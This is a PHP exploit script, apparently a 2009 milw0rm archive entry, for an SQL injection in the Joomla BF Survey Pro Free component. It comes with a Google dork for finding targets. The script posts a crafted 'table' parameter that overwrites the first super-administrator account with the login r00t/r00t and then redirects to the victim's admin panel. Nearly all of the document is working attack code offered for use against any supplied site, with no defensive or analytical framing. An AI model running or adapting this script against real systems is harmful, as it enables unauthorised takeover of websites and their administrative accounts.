<?php
echo '<h2>Joomla Component BF Survey Pro Free SQL Injection Exploit</h2>';
echo '<h4>jdc 2009</h4>';
echo '<p>Google dork: inurl:com_bfsurvey_profree</p>';
ini_set( "memory_limit", "128M" );
ini_set( "max_execution_time", 0 );
set_time_limit( 0 );
if( !isset( $_GET['url'] ) ) die( 'Usage: '.$_SERVER['SCRIPT_NAME'].'?url=www.victim.com' );
$vulnerableFile = "http://".$_GET['url']."/index.php";
$url = $vulnerableFile;
$data = array();
$data['option'] = 'com_bfsurvey_profree';
$data['task'] = 'updateOnePage';
$data['table'] = "jos_users set username=CHAR(".sqlChar( 'r00t' )."), password=CHAR(".sqlChar( md5('r00t' ) )."), email=CHAR(".sqlChar( 'x' ).") where gid=25 limit 1 -- '";
$output = getData();
die( '<script>alert("Now log in as r00t/r00t!");location.href="http://'.$_GET['url'].'/administrator/index.php";</script>' );
function shutUp( $buffer ) { return false; }
function sqlChar( $str ) { return implode( ',', array_map( 'ord', str_split( $str ) ) ); }
function getData()
{
global $data, $url;
ob_start( "shutUp" );
$ch = curl_init();
curl_setopt( $ch, CURL_TIMEOUT, 120 );
curl_setopt( $ch, CURL_RETURNTRANSFER, 0 );
curl_setopt( $ch, CURLOPT_URL, $url );
if( count( $data ) > 0 )
{
curl_setopt( $ch, CURLOPT_POST, count( $data ) );
curl_setopt( $ch, CURLOPT_POSTFIELDS, http_build_query( $data ) );
}
curl_setopt( $ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)" );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, 1 );
$result = curl_exec( $ch );
curl_close( $ch );
$return = ob_get_contents();
ob_end_clean();
return $return;
}
?>
# milw0rm.com [2009-09-09]
